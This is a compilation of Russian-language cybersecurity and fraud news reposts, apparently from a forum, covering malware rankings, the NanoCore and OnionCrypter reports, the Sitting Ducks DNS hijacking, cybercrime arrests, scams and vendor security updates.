По оценкам правоохранителей, мошенники заработали более 2 млн евро на одних только гражданах Германии. А общие потери могут исчисляться сотнями миллионов, так как злоумышленники работали еще в нескольких странах Восточной Европы.
source: europol.europa.eu/media-press/newsroom/news/call-centres-selling-fake- crypto-taken-down-in-bulgaria-serbia-and-cyprus
Исследователи компании Check Point опубликовали традиционный отчет Global Threat Impact Index за март 2021 года. Оказалось, что в этом месяце банковский троян IcedID (он же Bokbot) впервые вошел в рейтинг наиболее активной малвари, и сразу занял в нем второе место. Первое место в марте досталось трояну Dridex, который в феврале он лишь на седьмой строке топа.
В прошло месяце IcedID, впервые появившийся в 2017 году, активно распространялся с помощью нескольких спам-кампаний, затронувших около 11% организаций во всем мире. Одна из наиболее крупных кампаний использовала тематику COVID-19, чтобы привлечь внимание жертв к приманкам хакеров. Большинство вредоносных вложений в этой кампании представляли собой документы Microsoft Word с вредоносным макросом.
После установки этот троян пытается похитить данные учетной записи, платежные данные и другую конфиденциальную информацию с устройств жертв. Также IcedID может распространяться с помощью других вредоносных программ и использоваться на начальной стадии атаки при операциях с программами-вымогателями.
«IcedID существует уже несколько лет. В последнее время он стал активно эксплуатироваться, показывая, что киберпреступники продолжают адаптировать свои методы для все более успешных атак. И они до сих пор используют тему COVID-19, –– комментирует Василий Дягилев, глава представительства Check Point Software Technologies в России и СНГ. – IcedID – очень опасный троян. Он использует несколько методов для успешной кражи данных. Мы рекомендуем организациям убедиться, что их системы безопасности надежны, чтобы предотвратить компрометацию сетей и минимизировать риски. Очень важно обучать сотрудников киберграмотности: тогда они смогут распознать опасные электронные письма, которые распространяют IcedID и другие вредоносные программы».
Click to expand...
По информации Check Point, список самого активного вредоносного ПО в мире выглядет следующим образом:
Список самого активного вредоносного ПО в России отличается от общемирового:
Fareit — троян, обнаруженный в 2012 году. Его разновидности похищают пароли пользователей, данные FTP аккаунтов, телефонные номера и другую информацию, которую хранят браузеры жертв. Способен устанавливать другие вредоносные программы на зараженные устройства и использовался для распространения трояна P2P Game over Zeus.
Исходный код Fareit (версия 1.9) был опубликован в сети, и теперь любой
злоумышленник может изменить его и использовать во вредоносных кампаниях.
XMRig — опенсорсное ПО, впервые обнаруженное в мае 2017 года. Используется для майнинга криптовалюты Monero.
Trickbot — один из доминирующих банковских троянов в мире, который постоянно дополняется новыми возможностями, функциями и векторами распространения. Это гибкое и настраиваемое вредоносное ПО, которое может распространяться в рамках многоцелевых кампаний.
ИБ-аналитики связывают успех IcedID с ликвидацией ботнета Emotet, имевшей место в январе 2021 года. После его «смерти» преступники перешли на использование Dridex, Trickbot и Qakbot, но теперь IcedID тоже набирает популярность. К примеру, по мнению исследователей из компании Binary Defense, сразу «несколько хак-групп используют IcedID в качестве дроппера». Также на этой неделе об активности малвари предупредили и эксперты Microsoft.
__https://twitter.com/x/status/1381783387715735558
Источник: xakep.ru/2021/04/14/icedid/
Издание The Record пишет, что компания Netflix начала тестировать новую функцию безопасности, которая ограничивается совместный доступ к учетным записям, если их пользователи не проживают вместе.
В социальных сетях уже появились многочисленные жалобы пользователей, которые всей семьей использовали один аккаунт, но не жили в одном доме. По сути, им заблокировали доступ и предложили зарегистрировать свои собственные учетные записи.
__https://twitter.com/x/status/1369395237253222414
Однако Netflix вовсе не пытается бороться с людьми, чьи семьи живут далеко от них. На самом деле эта функциональность направлена на борьбу с хакерами, которые предпочитают покупать доступ к взломанным учетным записям у других преступников. В случае успеха новая инициатива должна пресечь использование чужих аккаунтов неавторизованными пользователями. «Этот тест должен помочь убедиться, что люди, использующие учетные записи Netflix, имеют право это делать», — говорят в компании.
Дело в том, что, по данным Recorded Future, в настоящее время в сети активны не менее 334 злоумышленников, продающих доступ к взломанным учетным записям Netflix или инструменты взлома таких аккаунтов. Цены варьируются от 5 до 20 долларов, а цена файла конфигурации для брутфорса учетных записей Netflix составляет от 20 до 50 долларов.
[](https://xakep.ru/wp- content/uploads/2021/03/342840/hacker-netflix.png)
[](https://xakep.ru/wp- content/uploads/2021/03/342840/hacker-netflix-2.png)
Невзирая на это многие пользователи отказались принимать участие в тесте Netflix и выразили недовольство решением компании (1, 2). Люди пишут, что они специально использовали совместные учетные записи и делились своей подпиской с удаленными членами семьи, а теперь им заблокировали доступ и вынудили пройти утомительную двухфакторную аутентификацию.
Источник: xakep.ru/2021/03/12/netflix-shared/
Знаю, многие здесь любят Manjaro.
Команда Manjaro Linux начала тестирование сервиса MDD (Manjaro Data Donor) для сбора данных о пользователях и отправки их на внешний сервер проекта.
Изначально планировалось, что эта функция будет включена по умолчанию, но это решение столкнулось с возражением других мейнтейнеров проекта. По информации на данный момент, телеметрия появится в виде опции, требующей согласия пользователя при первом запуске ОС.
Телеметрия будет собирать имя хоста, версию ядра, версии компонентов рабочего стола, подробную информацию об оборудовании и задействованных драйверах, сведения о размере и разрешении экрана, MAC-адреса сетевых устройств, серийные номера дисков, данные о дисковых разделах, информацию о количестве запущенных процессов и установленных пакетов, версии базовых пакетов, таких как systemd, gcc, bash и PipeWire.
Решение MDD написано на языке Python и вызывает утилиту inxi с параметрами "-Fxxx" для получения полного отчёта с информацией о системе. Для безопасности клиентов IP-адреса пользователей в сборке статистики не сохраняются, а в качестве идентификатора каждой системы используется хэш от содержимого файла /etc/machine-id.
Click to expand...
Оригинальный тред <https://forum.manjaro.org/t/testers-needed-manjaro-data- donor/170163>
Google представил набор новых функций для браузера Chrome. Эти обновления
направлены на защиту пользователей от онлайн-угроз и предоставление большего
контроля над личными данными.
В последней версии Chrome представлены улучшенная проверка безопасности,
упрощенное управление уведомлениями и одноразовые разрешения для сайтов.
Improved Safety Check
Главное нововведение в Chrome — это улучшенная Проверка безопасности, которая
теперь автоматически работает в фоновом режиме.
Этот умный инструмент заботится о вашей безопасности: отзывает разрешения у сайтов, которые вы больше не посещаете, блокирует подозрительные уведомления и многое другое. Всё это происходит прозрачно — вы будете в курсе любых предпринятых действий.
Проверка безопасности также защищает пользователей от мошеннических уведомлений, автоматически отзывая разрешения с сайтов, которые Google Safe Browsing определил как опасные.
На компьютерах Chrome будет предупреждать вас о потенциально опасных расширениях и предлагать перейти в панель управления, где их можно легко удалить или настроить. Кроме того, Проверка безопасности следит, чтобы вы всегда были на последней версии Chrome с актуальными патчами безопасности и могли проверить свои пароли на уязвимости.
Отписка от уведомлений в один клик
По просьбам пользователей Google упростил процесс отказа от ненужных
уведомлений с сайтов.
На устройствах Pixel, а вскоре и на других Android-устройствах, теперь можно просто нажать кнопку «Отписаться» в панели уведомлений, чтобы больше не получать уведомления от конкретного сайта.
Эта функция уже сократила объём уведомлений на 30% на поддерживаемых
устройствах Pixel, и вскоре Google планирует сделать её доступной на других
платформах.
Одноразовые разрешения для сайтов
Для ещё большего контроля над конфиденциальностью Chrome теперь предлагает
одноразовые разрешения для Android и компьютеров. Это значит, что сайты могут
получить доступ к вашим данным, таким как камера или микрофон, только на одну
сессию.
Когда вы закрываете сайт, все разрешения автоматически отменяются, предотвращая несанкционированный доступ. Это даёт пользователям больше контроля над своей конфиденциальностью, гарантируя, что сайты не смогут получить доступ к данным без вашего явного согласия.
С этими новыми функциями Google ещё раз подтверждает статус Chrome как одного из самых безопасных и надёжных браузеров. Эти обновления помогают пользователям чувствовать себя уверенно и защищённо в интернете. Google активно работает над тем, чтобы противостоять новым угрозам, и эти функции — часть большой стратегии по защите пользователей и предоставлению им большего контроля над своими данными.
Интеграция этих возможностей прямо в Chrome позволяет оставаться защищёнными без ущерба для удобства и функциональности. С выходом этих обновлений пользователи могут рассчитывать на более плавный и безопасный опыт работы в браузере, что укрепляет статус Chrome как лидера среди браузеров по всему миру.
[Источник](https://blog.google/products/chrome/google-chrome-safety- update-september-2024/)
Сотрудники УФСБ задержали в Томске хакера, который совершал атаки на объекты российской информационной инфраструктуры в интересах силовых структур Украины. Возбуждено дело о госизмене, обвиняемого взяли под стражу, сообщили в пресс- службе ведомства.
"Сотрудниками УФСБ России по Томской области выявлена и пресечена противоправная деятельность гражданина Российской Федерации, который оказывал содействие хакерским группировкам, координируемым силовыми структурами Украины, в деятельности, направленной против безопасности Российской Федерации", - сказано в сообщении.
Отмечается, что выражая приверженность украинской стороне, обвиняемый осуществлял хакерские атаки подрывного характера на объекты российской информационной инфраструктуры. Возбуждено уголовное дело по признакам состава преступления, предусмотренного ст. 275 УК РФ (государственная измена), в форме иного оказания помощи иностранному государству. Обвиняемый задержан, Кировский районный суд Томска избрал меру пресечения в виде заключения под стражу.
Ведется следствие.
• Video: <https://rg.ru/video/2023/10/31/v-tomske-arestovali-hakera- rabotavshego-na-specsluzhby-ukrainy.html>
*****
Федеральной службой безопасности Российской Федерации в городе Белово Кемеровской области - Кузбассе пресечена направленная против безопасности Российской Федерации противоправная деятельность гражданина России, совершившего государственную измену в форме оказания иной помощи иностранной организации.
Установлено, что задержанный, используя интернет-мессенджер, вступил в украинское киберподразделение, действующее в интересах разведывательных служб Украины, в составе которого осуществлял компьютерные атаки с применением вредоносного программного обеспечения на информационные ресурсы России, которые привели к нарушению работоспособности объектов критической инфраструктуры страны.
В адресах проживания и работы фигуранта уголовного дела, а также его связей проведены следственные действия и оперативно-разыскные мероприятия, в ходе которых изъяты средства вычислительной техники и связи, получены данные, подтверждающие его антироссийскую деятельность.
Задержанному предъявлено обвинение в совершении преступления, предусмотренного ст. 275 УК России (государственная измена), избрана мера пресечения в виде содержания под стражей.
• Video: https://vk.com/video-52620949_456270994
• Source: fsb.ru/fsb/press/message/single.htm%21id%3D10439845%40fsbMessage.html
Крах стейблкоина TerraUSD сильно ударил по основным токенам.
По оценкам сайта CoinMarketCap, масштабная распродажа криптовалют стерла с
рынка более 200 миллиардов долларов всего за 24 часа. Падение цен криптовалют
вызвано крахом сейблкоина TerraUSD, который сильно ударил по основным токенам.
За последний день биткоин упал на 10% до самого низкого уровня с декабря 2020
года, а Ethereum - на 16%.
В четверг ситуация стала только хуже, так как азиатские криптовалютные акции обрушились. Гонконгская финтех-компания BC Technology Group Ltd. упала в цене на 6,7%. Японская компания Monex Group Inc. , владеющая торговыми площадками TradeStation и Coincheck, завершила день падением акций на 10%.
Поскольку центральные банки по всему миру активно ужесточают денежно-кредитную политику для борьбы с инфляцией, цифровые токены столкнулись с давлением продавцов, желающих как можно скорее избавиться от рисковых активов. Фьючерсы на S&P 500 потеряли 0,8% в MSCI AC Asia Pacific Index.
Однако инвесторам в криптовалюты не привыкать к резким колебаниям рынка, и по
состоянию на 16:45 по гонконгскому времени Bitcoin и Ethereum быстро сократили
потери, снизившись на 4,2% и 9% соответственно.
Раньше мы писали про кражу криптовалюты на 13,4 миллионов долларов. По данным
исследователей, неизвестный злоумышленник применил эксплойт, воспользовавшись
ошибкой в флэш-кредите.
Жительница Бобруйска два раза за один день попалась на уловку мошенников и потеряла около девяти тысяч рублей. Подробности передает ГИОС УВД Бобруйского горисполкома.
Сперва женщине позвонил покупатель коляски, которую бобруйчанка продавала через популярную площадку. Мужчина предложил быстро оплатить товар через онлайн-сервис и отправил ссылку. Женщина перешла по ней, ввела реквизиты карты, и уже спустя пару минут ей пришло сообщение о списании 90,90 рубля. При обращении в банк бобруйчанке посоветовали заблокировать карту.
А затем женщине позвонили на Viber: мужчина назвал себя сотрудником банка и заявил, что злоумышленники оформляют на имя потерпевшей кредиты. При этом он назвал номера карточек, которыми пользовалась женщина. Она поверила и выполнила все указания: взяла кредит на 8900 рублей и пополнила этой суммой счет, привязанный к одной из банковских карт. Далее женщине сказали установить программу удаленного доступа и оформления страховых вкладов — якобы сотрудник банка должен перевести туда деньги для сохранности.
На следующий день бобруйчанка проверила баланс карточки и поняла, что денег уже нет.
Шесть миллионов рублей из банкомата Сбербанка украли еще в конце мая, но преступник до сих пор не пойман.
Кража произошла 28 мая. Около двух часов дня неизвестный мужчина открыл штатным ключом банкомат, установленный в торговом центре «Европа» в Бердске, внес изменения в программное обеспечение и, по данным Telegram-канала «ОПЕР Слил», фиктивно внес на 10 разных счетов клиентов банка суммы в размере 6 миллионов рублей. После чего обналичил деньги и скрылся.
Представители банка обратились в полицию с заявлением по факту несанкционированного проникновения в банкомат:
— Банк оказывает правоохранительным органам всестороннее содействие. За более подробным комментарием по ходу расследования уголовного дела рекомендуем обратиться в следственные органы, — прокомментировали в пресс-службе Сибирского банка ПАО «Сбербанк».
В полиции НГС подтвердили, что кража действительно была:
— По факту хищения денег возбуждено уголовное дело по статье 158 часть 4 УК РФ (хищение в особо крупном размере). Устанавливаются лица, причастные к преступлению, проводятся оперативно-разыскные мероприятия, — сообщили в ГУ МВД по Новосибирской области.
• Source: https://t.me/operdrain/26375
Last Sunday [April 11], the National Library website was the target of a ransomware attack and needed to be taken down. The agency, linked to the Special Secretariat for Culture, opted to [shut down the servers](https://olhardigital.com.br/2021/04/13/internet-e-redes- sociais/discord-bloqueia-servidores-de-conteudo-adulto-em-app-para-ios/) to alleviate the potential problems caused and new invasions.
However, last Tuesday [April 13] the site was activated again, and the victim of a second attack.
The national library notified the Office of Institutional Security of the Presidency of the Republic to investigate the case. The type of ransomware or group that is behind the attack was not reported.
If additional details become available, DataBreaches.net will update this news.
Специалисты компании Trustwave обнаружили [необычную кампанию ](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file- trickery-part-ii-fake-icon-delivers-nanocore/)по распространению трояна NanoCore. В электронных письмах спамеры используют фальшивые файлы .zipx, которые на самом деле представляют собой иконки с дополнительной информацией в формате .rar. Все это призвано усложнить обнаружение малвари и помочь обойти фильтры.
Письма злоумышленников, как правило, написаны от лица «менеджера по закупкам» некой организации (чаще всего, подделывается почта настоящего делового партнера цели). Такие фишинговые сообщения содержат вложение с именем «NEW PURCHASE ORDER.pdf*.zipx», однако файл не соответствует спецификации .zipx. На самом деле он представляет собой «файл icon с сюрпризом», как пишут эксперты. То есть это бинарник изображения, к которому прикреплена дополнительная информация в формате .rar — вредоносный EXE-файл, содержащий полезную нагрузку.
[](https://xakep.ru/wp- content/uploads/2021/03/342848/screenshot-2021-03-10-at-10-01-04.png)
Если жертва попадается на удочку мошенников и нажимает на вложение, а на ее машине установлен архиватор (WinZip или WinRAR), исполняемый файл извлекается. 7Zip тоже может распаковать такой файл, но для этого может потребовать не одна попытка – порой архиватор сообщает об ошибке.
«Анализ EXE-файлов показывает, что они представляют собой образцы NanoCore RAT версии 1.2.2.0. Он создает свои копии в папке AppData и внедряет вредоносный код в процесс RegSvcs.exe», — пишут эксперты.
Click to expand...
Напомню, что NanoCore был впервые обнаружен в далеком 2013 году. Проникнув в систему, он собирает адреса электронной почты и пароли, а также активирует веб-камеры зараженных устройств. Малварь может выступать и в качестве дроппера для дополнительных вредоносных программ, а также платформы для создания ботнетов, используя зараженные хосты для DDoS-атак.
Нужно заметить, что разработчик трояна, Тейлор Наддлстон (Taylor Huddleston), был осужден в США еще в 2018 году, однако, как можно заметить, его дело по-прежнему живет.
Источник: xakep.ru/2021/03/12/nanocore-zipx/
Исследователи Avast Threat Labs представители отчет о крипторе OnionCrypter, который с 2016 года широко используется многими семействами малвари, включая Ursnif, Lokibot, Zeus, AgentTesla и Smokeloader. Он помогает скрывать вредоносные части кода с помощью шифрования, чтобы затруднить его обнаружение и анализ.
По данным компании, за последние три года Avast защитила почти 400 000 пользователей по всему миру от малвари, использовавшей этот криптор. Диаграмма ниже показывает, какие семейства малвари, использующие OnionCrypter, уже были обнаружены Avast.
Эксперты пишут, что устройство современной малвари очень похоже на строение автомобиля: она тоже состоит из множества деталей. Только вместо двигателя, колес и руля у таких программ есть загрузчик, полезная нагрузка и командный модуль.
Одной из таких «деталей» часто выступает криптор, который помогает скрыть вредоносные части кода с помощью шифрования, и в итоге код может на первый взгляд показаться безвредным, и его будет сложнее прочитать. Для разработчиков малвари криптор — важный инструмент для противодействия защите. В то же время для исследователей обнаружение криптора позволяет быстрее находить и идентифицировать новое вредоносное ПО, которое его содержит.
Название OnionCrypter никак не связано с Tor (сетью или браузером) и является отсылкой к обычному луку: криптор, как и лук, состоит из множества слоев шифрования, защищающих информацию от исследователей, антивирусов и решений безопасности. Именно эта многослойность делает OnionCrypter весьма необычным.
Как видно на иллюстрации ниже, архитектура OnionCrypter сложна и состоит из трех слоев. В отчете компании каждому из них посвящен отдельный и подробный раздел.
Учитывая достаточно долгое время использования и распространенность OnionCrypter, эксперты пришли к выводу, что разработчики продают его в качестве услуги. Кроме того, похоже, создатели OnionCrypter предлагают покупателям специальную настройку, чтобы сделать его еще менее заметным. В рекламе на хакерских форумах OnionCrypter часто называют «совершенно незаметным».
Теперь информация, полученная исследователями Avast, значительно упростит задачу по обнаружению OnionCrypter и любого вредоносного ПО, которое его использует.
Источник: xakep.ru/2021/03/18/onioncrypter/
По информации Воронежских полицаев, 63-летний дедок обратился в местную дежурку, рассказав, что передал скамерам более 44 миллионов рублей. Началось все 4 ноября, когда ему на WhatsApp набрал «бывший шеф». На аватарке стояла его фотография. Скамер сообщил пенсионеру о проверке всех, включая бывших сотрудников, на причастность к финансированию различных недружественных организаций.
После этого с ним связался человек, который представился сотрудником ФСБ. Он порекомендовал перевести весь кэш на супер-надежные счета, а имеющийся налик доставить курьером. К деду должен был заехать «сотрудник Росфинмониторинга», который заберет средства после произношения кодового слова «осень».
— Он перевел 16 и 17 миллионов рублей с двух счетов, добавил к ним свои похоронные и передал все шныряле. После передачи денег он решил выяснить, что делать дальше, но все сообщения были удалены из диалога. Сейчас правоохранители пытаются найти скамеров (удачи) и тех, кто причастен к данному эпизоду. Вероятно, за жопу возьмут дропов, которые принимали кэш на карты. Возбуждено дело по ст. 159.
Киберпреступникам удалось получить контроль более чем над 35 тыс. зарегистрированных доменов, используя вектор DNS-атаки под названием «Sitting Ducks». Суть заключается в эксплуатации ошибок конфигурации на уровне регистратора и недостаточной проверке владельца со стороны провайдера.
На Sitting Ducks обратили внимание специалисты компаний Infoblox и Eclypsium. По их словам, в Сети удалось обнаружить более миллиона доменов, уязвимых перед этим вектором атаки.
Исследователи считают, что за эксплуатацией Sitting Ducks стоит «множество российских киберпреступных групп», которые используют взломанные домены для рассылки спама и в фишинговых кампаниях.
Интересно, что Sitting Ducks [описывался ещё в 2016 году](https://thehackerblog.com/floating-domains-taking-over-20k-digitalocean- domains-via-a-lax-domain-import-system/) Мэтью Брайантом из Snap. Тем не менее вектор продолжает работать, однако для успешной атаки нужен ряд условий:
• целевой домен должен использовать или делегировать службы DNS провайдеру, который при этом не является регистратором;
• сервер имён не может разрешать запросы, поскольку ему не хватает информации о домене (некорректное делегирование);
• DNS-провайдер должен разрешить заявку на домен без надлежащего подтверждения права собственности или требований доступа к аккаунту владельца.
Как [объясняют](https://blogs.infoblox.com/threat-intelligence/who-knew- domain-hijacking-is-so-easy/) в Infoblox, атакующие могут задействовать Sitting Ducks для захвата доменов, использующих DNS-службы, например, от хостера. Для начала злоумышленнику надо будет создать учётную запись в системе DNS-провайдера, а потом заявить свои права на домен.
После этого киберпреступник создаёт вредоносный веб-сайт и настраивает параметры DNS таким образом, чтобы IP резолвился на поддельный адрес. У законного владельца при этом не будет возможности поменять DNS-записи.
Жительница американского города Индио штат Калифорния признала вину в продаже фентанила и метамфетамина через площадки даркнета ToRReZ и Dark0de, а также в отмывании денег через криптомиксеры.
По данным прокуратуры, в период с 2020 по 2022 годы 34-летняя Холли Даниэль Адамс (Holly Danielle Adams) с сообщником Девлином Хоснером (Devlin Hosner) заработали сотни тысяч долларов на продаже таблеток оксикодона, спрессованных с фентанилом. Незаконно полученную прибыль они переводили на криптовалютные кошельки и отмывали через криптомиксеры.
В сентябре 2021 года местные правоохранительные органы провели обыск по адресу, где проживали обвиняемые. Хоснер пытался задержать полицейских, чтобы помешать обыску, в то время как Адамс уничтожала таблетки с помощью химического раствора. Адамс и Хоснер были арестованы, но вскоре вышли на свободу. Через несколько месяцев они возобновили продажу фентанила в даркнете.
В марте 2022 года федеральные правоохранительные органы провели рейд в гостиничном номере, где временно проживали Адамс и Хоснер. Полиция конфисковала почти килограмм таблеток оксикодона с прессованным фентанилом и шестьдесят граммов метамфетамина. Сейчас обвиняемые находятся под стражей.
Окружной судья Джон А. Мендес (John A. Mendez) должен вынести приговор для Адамс 24 сентября 2024 года. Женщине грозит тюремное заключение сроком от 10 лет до пожизненного, а также штраф до $1 млн.
Почему этих хакеров боятся банковские учреждения и телекоммуникационные провайдеры по всему миру?
Власти Кот-д’Ивуара, франкоязычного государства в Западной Африке, задержали хакера, который, как считается, долгое время являлся ключевым членом киберпреступной группировки OPERA1ER, атаковавшей телекоммуникационные и финансовые компании с помощью вредоносных программ, фишинга и компрометации деловой электронной почты.
Группировка, также известная как NX$M$, DESKTOP Group и Common Raven, подозревается в краже от 11 до 30 миллионов долларов за последние четыре года в ходе более чем 30 атак в 15 странах Африки, Азии и Латинской Америки.
Подозреваемый был арестован в начале июня в результате совместной операции под названием Nervone с участием африканской полиции, Интерпола, компании по кибербезопасности Group-IB и телекоммуникационного оператора Orange.
Дополнительную информацию, которая также помогла в расследовании, предоставили отдел уголовного расследования Секретной службы США и исследователи кибербезопасности из Booz Allen Hamilton DarkLabs.
«Согласно отчету Интерпола об угрозах кибербезопасности в Африке за 2022 год, киберпреступность является растущей угрозой в регионе Западной Африки, а жертвы этих преступлений находятся по всему миру. Операция Nervone подчёркивает решимость Интерпола активно бороться с угрозой киберпреступности в данном регионе», — говорится в официальном заявлении Интерпола.
Члены OPERA1ER преимущественно говорят по-французски и, как полагается, базируются именно в Африке. Они используют весьма разнообразные инструменты в своих атаках, включая общедоступные вредоносные программы и фреймворки, такие как Metasploit и Cobalt Strike.
Первичный доступ к целевым сетям хакеры OPERA1ER обычно получают через специализированные фишинговые письма, которые эксплуатируют популярные темы, такие как счета или уведомления о доставке почты. А после получения доступа злоумышленники распространяют широкий спектр вредоносных программ первого этапа, включая Netwire, BitRAT, venomRAT, AgentTesla, Remcos, Neutrino, BlackNET и Venom RAT, а также перехватчики и дамперы паролей.
Исследователи выяснили, что хакеры OPERA1ER обычно поддерживают доступ к скомпрометированным сетям от трёх до двенадцати месяцев, иногда атакую одну и ту же компанию по несколько раз.
Исследователи Symantec также обнаружили связь между OPERA1ER и группой киберпреступников, которую они отслеживают под кодовым названием Bluebottle. Эти злоумышленники использовали подписанный драйвер Windows в атаках против как минимум трёх банков во франкоязычных африканских странах.
«Любая попытка расследовать сложную киберпреступную группу, такую как OPERA1ER, которая украл миллионы у компаний финансового сектора и телекоммуникационных провайдеров по всему миру, требует высоко скоординированных усилий между органами государственной власти и частным сектором», — заявил Дмитрий Волков, генеральный директор компании Group-IB.
«Успех операции Nervone демонстрирует важность обмена данными об угрозах. Только благодаря нашему сотрудничеству с Интерполом, Orange CERT-CC и партнерами из частного и государственного секторов — мы смогли составить полную картину происходящего», — подытожил Волков.
source:
interpol.int/News-and-Events/News/2023/Suspected-key-figure-of-notorious-
cybercrime-group-arrested-in-joint-operation
group-ib.com/media-center/press-releases/operation-nervone
Сотрудник хотел вернуться в компанию, но теперь ему грозит 10 лет тюрьмы.
После увольнения системный администратор нарушил работу своего бывшего работодателя, крупной финансовой компании на Гавайях, в надежде вернуться на работу. 40-летний Кейси К. Уметсу работал системным администратором в компании с 2017 по 2019 год, затем работодатель уволил его.
Минюст США сообщает , что обвиняемый признал себя виновным в том, что он получил доступ к веб-сайту своего бывшего работодателя и внес изменения в конфигурацию сайта для перенаправления трафика и электронной почты на внешние компьютеры, тем самым нарушив работу сайта и электронной почты компании.
Уметсу использовал учетные данные, которые были предоставлены ему работодателем и не были аннулированы после его увольнения. Также Уметсу предпринял дополнительные действия, которые заблокировали IT-специалистам фирмы доступ к панели администрирования веб-сайта. Уметсу признал, что он это сделал для того, чтобы убедить своего бывшего работодателя снова нанять его с более высокой зарплатой.
Пострадавшая компания узнала, кто несет ответственность за взлом, после сообщения об инциденте кибербезопасности в ФБР. Суд над Уметсу назначен на 19 января 2023 года. Ему грозит до 10 лет тюрьмы и штраф в размере до $250 000.
source: justice[.]gov/usao-hi/pr/honolulu-man-pleads-guilty-sabotaging-former- employer-s-computer-network
Google в своём блоге [рассказал](https://blog.google/technology/safety-
security/making-sign-safer-and-more-convenient/) о способах повышения
безопасности входа в систему и сообщил, что к концу 2021 года автоматически
подключит двухфакторную аутентификацию дополнительно 150 миллионам
пользователей. И потребует, чтобы еще 2 миллиона авторов YouTube включили этот
способ идентификации.
Действия Google направлены на улучшение мер безопасности для всех устройств и
учетных записей пользователей с сохранением простоты и удобства входа в
систему.
Кроме двухфакторной аутентификации, Google разработал ещё одну форму аутентификации – ключи безопасности, которые встраиваются в устройства пользователей. По словам компании, этот метод обеспечит наивысшую степень безопасности входа в аккаунт. Этот способ требует, чтобы пользователь нажимал свой ключ безопасности при подозрительных попытках входа в учётную запись.
Недавно Google запустил One Tap и новое семейство API-интерфейсов идентификации под названием Google Identity Services, в котором для входа пользователей на партнерские веб-сайты и в приложения, используются токены безопасности, а не пароли. Эти новые службы представляют собой будущее аутентификации и защиты от уязвимостей, таких как кликджекинг, отслеживание пикселей и другие угрозы, связанные с веб-доступом и приложениями.
Специалисты ИБ-компаний Acronis и Search-Lab Роберт Нойманн (Robert Neumann) и Сергей Эбрхарт (Gergely Eberhardt) раскрыли подробности о крупном подпольном сервисе SMS-рассылок, работавшем на основе бот-сети из тысяч взломанных маршрутизаторов TP-Link MR6400 со встроенной возможностью отправлять SMS- сообщения.
По меньшей мере с 2016 года взломанные мартшрутизаторы использовались для рассылки сообщений со ставками, кодами верификации, подтверждениями online- платежей или пожертвований или отправки загадочных сообщений, которые экспертам пока не удалось расшифровать.
В интервью изданию The Record Нойманн рассказал, что заинтересовался проблемой после того, как ему в руки попал зараженный маршрутизатор с поддержкой 4G, «преподнесший» своему владельцу огромный телефонный счет, львиную долю в котором составляла плата за исходящие SMS-сообщения, отправленные с SIM-карты на устройстве.
Как удалось выяснить, хакеры скомпрометировали маршрутизаторы, воспользовавшись обнаруженной в 2015 году уязвимостью (CVE-2015-3035), позволяющей без авторизации получить доступ к файлам на устройствах TP-Link. Нойман смог воспроизвести эксплоит, использующий CVE-2015-3035, для доступа к одной из LTE-функций маршрутизатора, служащей для «отправки сообщений, чтения входящих и исходящих SMS-цепочек, сбора информации о SIM-карте и модификации LAN и часовых настроек».
Хотя уязвимость была исправлена в версиях прошивок TP-Link, выпущенных после 2015 года, многие маршрутизаторы и по сей день остаются уязвимыми.
Нойманну не удалось идентифицировать создателей ботнета, как и обнаружить рекламу подпольного SMS-сервиса, однако разнообразие SMS-рассылок говорит о наличии широкой клиентской базы.
По словам экспертов, ботнет все еще работает, но с 2018 года его активность значительно снизилась.
«Отсутствие интереса у киберпреступников, обновление прошивки устройства до исправленной версии, переход на новую уязвимую модель с более высокой рыночной долей или блокировка [функций отправки SMS] на SIM-карте – все это может способствовать снижению активности», - отметил Нойманн.
• Source: [https://vblocalhost.com/presentatio...ation-a-story-of-messaging- as-a-service-maas/](https://vblocalhost.com/presentations/from-match-fixing- to-data-exfiltration-a-story-of-messaging-as-a-service-maas/)
Румынская компания Bitdefender опубликовала [универсальную утилиту](https://www.bitdefender.com/blog/labs/bitdefender-offers-free- universal-decryptor-for-revil-sodinokibi-ransomware/) для дешифровки файлов, пострадавших в результате атак вымогателя REvil (Sodinokibi). Инструмент работает для любых данных, зашифрованных до 13 июля 2021 года.
Эксперты Bitdefender пишут, что этот инструмент был создан в сотрудничестве с доверенными партнерами из правоохранительных органов, однако сообщить какие- либо детали в компании пока отказываются, ссылаясь на продолжающееся расследование.
Напомню, что именно 13 июля текущего года вся инфраструктура REvil ушла в офлайн без объяснения причин. Тогда речь шла об отключении целой сети обычных и даркнет-сайтов, которые использовались для переговоров о выкупе, слива похищенных у жертв данных, а также внутренней инфраструктуре вымогателя.
Незадолго до этого, в начале июля 2021 года операторы REvil осуществили масштабную атаку на клиентов известного поставщика MSP-решений Kaseya. В результате злоумышленники развернули шифровальщика в тысячах корпоративных сетей. Кроме того, незадолго до атаки на клиентов Kaseya REvil попала на первые полосы многих изданий, так как атаковала компанию JBS, которая является крупнейшим в мире поставщиком говядины и птицы, а также вторым по величине производителем свинины. Компания работает в США, Австралии, Канаде, Великобритании и так далее, обслуживая клиентов из 190 стран мира.
В итоге президент США Джо Байден в телефонном разговоре[ призвал](https://www.whitehouse.gov/briefing-room/statements- releases/2021/07/09/readout-of-president-joseph-r-biden-jr-call-with- president-vladimir-putin-of-russia-2/) президента России Владимира Путина пресечь атаки хакеров-вымогателей, действующих с территории РФ. Байден заявил, что если после этого Россия не примет меры, США будут вынуждены принять их сами.
Вскоре после этого REvil ушла в офлайн на несколько месяцев, и вернулась в строй лишь 7 сентября 2021 года. По данным ИБ-компаний, операторы REvil вновь активировали старые сайты, создали новые профили на форумах и уже начали снова проводить атаки.
источник: https://xakep.ru/2021/09/16/revil-master-decrypter/
В аппаратных генераторах случайных чисел обнаружена критическая уязвимость, затрагивающая миллиарды IoT-устройств. Поскольку такие генераторы не могут корректно выдать случайные числа, существует риск кибератак на «умные» устройства.
Об уязвимости рассказали специалисты компании Bishop Fox Дэн Петро и Аллан Сесил. В опубликованном отчёте исследователи описывают проблему так:
«В ходе наших тестов оказалось, что так называемые ‘’случайные’’ числа на деле оказались не такими уж рандомными, особенно когда речь идёт об IoT- устройствах. В большинстве случаев девайсы выбирают ключи шифрования уровня 0 или ещё хуже. Такой подход может привести к катастрофическим последствиям для безопасности умных устройств».
Генераторы случайных чисел являются ключевыми компонентом отдельных криптографических приложений. С их помощью, например, задаются ключи, однократно используемые числа и соли (модификатор входа хеш-функции). Однако в случае IoT-девайсов эксперты указывают на серьёзную киберугрозу, связанную с недостаточно корректной работой генераторов случайных чисел.
